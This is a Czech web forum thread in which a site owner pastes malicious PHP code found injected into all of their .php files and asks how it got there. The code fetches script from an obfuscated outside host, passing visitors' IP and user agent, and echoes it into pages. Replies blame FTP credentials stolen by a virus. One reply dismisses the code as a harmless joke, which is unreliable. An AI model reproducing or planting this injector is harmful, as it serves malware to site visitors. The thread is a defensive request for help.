Autor Zpráva
Mr. Stoolky
Profil *
Zdravím,
vytvářím webové stránky v php s redakčním systémem. Dnes jsem se chtěl pustit do dalších úprav a najednou jsem viděl v php souborech řetězce, které jsem tam nedal já.
<?php
#28d6a5#
error_reporting(0); @ini_set('display_errors',0); $wp_v13 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_v13) && !preg_match ('/bot/i', $wp_v13))){

$wp_v0913="."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_v13]http://"."html"."option".".com/"."option"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_v13);

if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_v0913); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

$wp_13v = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_13v = @file_get_contents($wp_v0913);}

elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_13v=@stream_get_contents(@fopen($wp_v0913, "r"));}}

if (substr($wp_13v,1,3) === 'scr'){ echo $wp_13v; }
#/28d6a5#
?>
Heslo k ftp účtu jsem už změnil a kód vymazal. Chci se zeptat, odkud se tam mohl tento kód vzít, či jak předejít tomu, aby se to opakovalo. Díky
sitole
Profil
Ahoj, kde jsi tento kod měl přesně napsaný? Index?
Dále také kde v souboru? <head> <body>

Tady máš přímé řešení :) Virus na webu

Cituji!
"Někdo z lidí, kteří znají přístupové údaje k FTP účtu vašeho webu, má zavirovaný počítač. Virus si u své oběti přečetl heslo, které následně poslal jiné zavirované mašině (obvykle v zahraničí), ta se pravidelně připojuje k vašemu FTP účtu a pečlivě klade škodlivý kód do všech stránek, kde to dává smysl. Nakladené svinstvo se pak pokouší zneužít bezpečnostní díry prohlížečů a zavirovat stroj vašeho návštěvníka."
Mr. Stoolky
Profil *
Bylo to ve všech .php souborech. Ten kód nevím k čemu slouží, vypadá to, že je to stavěné na wordpress. Na tom mi ale web neběží...
Jinak díky za odkázané vlákno.
sitole
Profil
Mr. Stoolky:
Tak není možné že jednoduše přišlaaktualizace? :)
Mr. Stoolky
Profil *
sitole:
Jakou aktualizaci myslíte? Aktualizace čeho?
snazimse
Profil
Mr. Stoolky:

Ten kód, podle mě ani nefunguje správně, na řádku 5 je syntaktická chyba. Vypadá to asi opravdu na vir, ale nemá to žádné předpoklady k tomu, aby se to dalo použít, vypadá to na spíš na hloupý žert. Mě to žádný smysl nedává, že by to mělo fungovat správně.
Mr. Stoolky
Profil *
snazimse:
Díky, aspoň mě to uklidnilo :)
sitole
Profil
Mr. Stoolky:
Říkal jsi, že to jede na WP.. Tam někdy příjdou aktualizace..
MONTYCEK
Profil
sitole:
ale Mr. Stoolky psal "že je to stavěné na wordpress. Na tom mi ale web neběží... "

Vaše odpověď


Prosím používejte diakritiku a interpunkci.

Ochrana proti spamu. Napište prosím číslo dvě-sta čtyřicet-sedm: